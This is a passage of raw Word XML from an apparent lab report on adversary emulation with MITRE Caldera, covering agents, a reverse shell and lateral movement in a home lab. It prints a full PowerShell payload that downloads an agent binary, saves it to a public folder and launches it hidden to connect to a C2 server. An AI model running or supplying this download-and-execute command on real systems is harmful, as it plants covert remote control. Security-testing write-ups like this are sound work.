          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is an adversary emulation platform developed by MITRE for testing network defenses. It uses agents, such as Sandcat and Manx, which are programs deployed on target systems (like a RAT) to execute commands and gather information. Plugins extend Caldera’s functionality, like the stockpile plugin that provides additional abilities. Adversaries in Caldera are profiles of simulated threat actors, while operations are the execution of these adversary profiles against a network. </w:t>
      </w:r>
      <w:r w:rsidR="00576E4A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The available abilities are derived from the MITRE ATT&amp;CK framework, representing specific techniques or exploits used by attackers. So the platform basically allows red teams to create and execute attack scenarios through a GUI to ultimately help organizations assess their security posture by simulating real-world attack techniques in a controlled environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E441B3" w14:textId="3BBECF14" w:rsidR="00576E4A" w:rsidRPr="00555FF0" w:rsidRDefault="00576E4A" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The cool thing was, each ability had a MITRE ATT&amp;CK code and displayed each command </w:t>
      </w:r>
      <w:r w:rsidR="000A0EAF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and output </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>throughout the process</w:t>
      </w:r>
      <w:r w:rsidR="000A0EAF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Or we could manually do attacks and upload customized payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00703338" w14:textId="179DCDA4" w:rsidR="000A0EAF" w:rsidRPr="00555FF0" w:rsidRDefault="000A0EAF" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We decided to utilize the Manx agent to do a reverse-shell </w:t>
      </w:r>
      <w:r w:rsidR="005558D0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that communicates via TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAFC9B" w14:textId="05712BEB" w:rsidR="00AB0891" w:rsidRDefault="006C4B24" w:rsidP="006976BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initial access Agent payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA3703" w14:textId="3D37DBDB" w:rsidR="006C4B24" w:rsidRPr="00D54438" w:rsidRDefault="006C4B24" w:rsidP="00D54438">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54438">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>if ($host.Version.Major -ge 3){$ErrAction= "ignore"}else{$ErrAction= "SilentlyContinue"};$server="http://192.168.1.100:8888";$socket="</w:t>
      </w:r>
      <w:r w:rsidR="00DA2F22" w:rsidRPr="00D54438">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>192.168.1.100</w:t>
      </w:r>
      <w:r w:rsidRPr="00D54438">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>:7011";$contact="udp";$url="$server/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows");$wc.Headers.add("file","manx.go");$data=$wc.DownloadData($url);Get-Process | ? {$_.Path -like "C:\Users\Public\caldera.exe"} | stop-process -f -ea $ErrAction;rm -force "C:\Users\Public\caldera.exe" -ea $ErrAction;([io.file]::WriteAllBytes("C:\Users\Public\caldera.exe",$data)) | Out-Null;Start-Process -FilePath C:\Users\Public\caldera.exe -ArgumentList "-socket $socket -http $server -contact $contact" -WindowStyle hidden;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B808C64" w14:textId="7E681D42" w:rsidR="006C4B24" w:rsidRDefault="005558D0" w:rsidP="006976BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This payload was ran on ‘enduser1’ powershell </w:t>
      </w:r>
      <w:r w:rsidR="00A714BC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">without their knowledge. </w:t>
      </w:r>
      <w:r w:rsidR="004A6664">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">So it established </w:t>
      </w:r>
      <w:r w:rsidR="004A6664">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>communication with the command and control (C2) server aka CALDERA running on Kali</w:t>
      </w:r>
      <w:r w:rsidR="00633CD7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabling command execution and data exfiltration</w:t>
      </w:r>
      <w:r w:rsidR="00EF1BF2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Though we did not do exfiltration, but</w:t>
      </w:r>
      <w:r w:rsidR="006260AA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00EF1BF2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>agent served as a pivot to  expand</w:t>
      </w:r>
      <w:r w:rsidR="006260AA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> control </w:t>
      </w:r>
      <w:r w:rsidR="00EF1BF2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or discovery of the internal network. </w:t>
      </w:r>
      <w:r w:rsidR="00B3226D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The agent connection was confirmed in Kali’s terminal server log, and took </w:t>
      </w:r>
      <w:r w:rsidR="00EF1BF2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">around </w:t>
      </w:r>
      <w:r w:rsidR="00B3226D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a minute to confirm </w:t>
      </w:r>
      <w:r w:rsidR="00EF1BF2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="00B3226D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PID on the GUI. </w:t>
      </w:r>
      <w:r w:rsidR="00EF1BF2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">From there we were ready to begin the operation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A0382" w14:textId="2A562F32" w:rsidR="00AB0891" w:rsidRPr="006976BF" w:rsidRDefault="00A87E24" w:rsidP="006976BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658241" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55479710" wp14:editId="777698A8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1047750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3136900" cy="1849120"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21363"/>
                <wp:lineTo x="21513" y="21363"/>
                <wp:lineTo x="21513" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="24323085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30851" name="Picture 4"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36900" cy="1849120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005E5538">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We had a few attempts of trying varying abilities and adversaries</w:t>
      </w:r>
      <w:r w:rsidR="00046512">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the best attack combo</w:t>
      </w:r>
      <w:r w:rsidR="007514CD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and in the end found a classic worm to be pretty effective for lateral movement throughout the network – makes sense. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These were the tactics used in order to traverse from user1 to user2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">While the </w:t>
      </w:r>
      <w:r w:rsidR="00B05DCD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>operation was running, we were able to add manual commands if needed and view the ones being run. View the debrief pdf document for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C56E4E8" w14:textId="6EB29100" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="00D37F5F" w:rsidP="00ED0149">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shortcomings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7223DD" w14:textId="391DF3A9" w:rsidR="009303D9" w:rsidRDefault="00075783" w:rsidP="009B5325">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00070F73">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Unfortunately, </w:t>
      </w:r>
      <w:r w:rsidR="00AC2DDE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="001E7D36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ue to time constraints, we were unable to run multiple trials </w:t>
      </w:r>
      <w:r w:rsidR="00A22FDD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidR="001E7D36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A22FDD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>did not allow us</w:t>
      </w:r>
      <w:r w:rsidR="001E7D36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> more time for troubleshooting.</w:t>
      </w:r>
      <w:r w:rsidR="00A22FDD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B1A91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This resulted in a </w:t>
      </w:r>
      <w:r w:rsidR="003009B1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>few key i</w:t>
      </w:r>
      <w:r w:rsidR="00BF3648">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ncidents that did not allow us to achieve </w:t>
      </w:r>
      <w:r w:rsidR="00E326B0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the results that we desired from this research</w:t>
      </w:r>
      <w:r w:rsidR="00CE7CFE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33621A2C" w14:textId="21E3F458" w:rsidR="00CB5F6F" w:rsidRDefault="00931E58" w:rsidP="00CB5F6F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Insufficient Hardware requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F66850" w14:textId="5941CA46" w:rsidR="00CB5F6F" w:rsidRDefault="00CB5F6F" w:rsidP="00CB5F6F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we had to use our own hardware to run these </w:t>
      </w:r>
      <w:r w:rsidR="001E4454">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">virtual machines, </w:t>
      </w:r>
      <w:r w:rsidR="002B46CA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="008C6A0B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ran into performance issues and slow performance when having all virtual machines up and running at the same time</w:t>
      </w:r>
      <w:r w:rsidR="00782148">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D33066">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Namely, Caldera</w:t>
      </w:r>
      <w:r w:rsidR="00754ED7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> itself recommends</w:t>
      </w:r>
      <w:r w:rsidR="00D33066">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at least an </w:t>
      </w:r>
      <w:r w:rsidR="00D33066">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intel i7</w:t>
      </w:r>
      <w:r w:rsidR="00236761">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Desktop Processor </w:t>
      </w:r>
      <w:r w:rsidR="007C6D3E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in addition to circa 8 GB of DDR4 RAM.</w:t>
      </w:r>
      <w:r w:rsidR="000F7398">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00785791">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Both laptops</w:t>
      </w:r>
      <w:r w:rsidR="000F7398">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E47781">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that we used to run our </w:t>
      </w:r>
      <w:r w:rsidR="00741026">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simulations vastly d</w:t>
      </w:r>
      <w:r w:rsidR="00785791">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00741026">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> not meet the recommended specifications</w:t>
      </w:r>
      <w:r w:rsidR="00A20A70">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, thus resulting in a myriad of issues. Namely, the A</w:t>
      </w:r>
      <w:r w:rsidR="00FC5259">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ctive Directory </w:t>
      </w:r>
      <w:r w:rsidR="002B100E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Controller (AD DC) Windows Server 2022 becoming almost non-responsive toward the tail end of our allotted time for testing. </w:t>
      </w:r>
      <w:r w:rsidR="0050190C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This resulted in</w:t>
      </w:r>
      <w:r w:rsidR="00C079AF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E70E9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>several hours of the v</w:t>
      </w:r>
      <w:r w:rsidR="00B07D57">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>irtual machine hanging, and eventually</w:t>
      </w:r>
      <w:r w:rsidR="00C508DA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B07D57">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:r w:rsidR="00B07D57">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>decided to remake the Domain Controller from scratch. Fortunately, this remedy worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD7E73" w14:textId="14C043E7" w:rsidR="00B07D57" w:rsidRDefault="00805FCD" w:rsidP="00B07D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lateral Movement Attempted by CALDERA Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16520F7A" w14:textId="50D5F860" w:rsidR="00785791" w:rsidRPr="007C6D3E" w:rsidRDefault="00785791" w:rsidP="00785791">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00517F2F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Despite our best efforts </w:t>
      </w:r>
      <w:r w:rsidR="009539AE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00517F2F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the given time that we had, </w:t>
      </w:r>
      <w:r w:rsidR="000F39F1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we have successfully launched an attempt</w:t>
      </w:r>
      <w:r w:rsidR="009D5862">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform Lateral Movement with an Agent. This resulted in </w:t>
      </w:r>
      <w:r w:rsidR="004D6C3B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the results being printed </w:t>
      </w:r>
      <w:r w:rsidR="000C069D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="004D6C3B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the CALDERA console</w:t>
      </w:r>
      <w:r w:rsidR="00A556A9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, as shown in </w:t>
      </w:r>
      <w:r w:rsidR="00E062E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:r w:rsidR="00A556A9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7.</w:t>
      </w:r>
      <w:r w:rsidR="00CA6CBF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unfortunately, the results leave much to be desired, but at least the attempt looks like it </w:t>
      </w:r>
      <w:r w:rsidR="00E43300">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00A210D8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">successfully launched, thus proving that CALDERA </w:t>
      </w:r>
      <w:r w:rsidR="009F4CAD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">was successfully </w:t>
      </w:r>
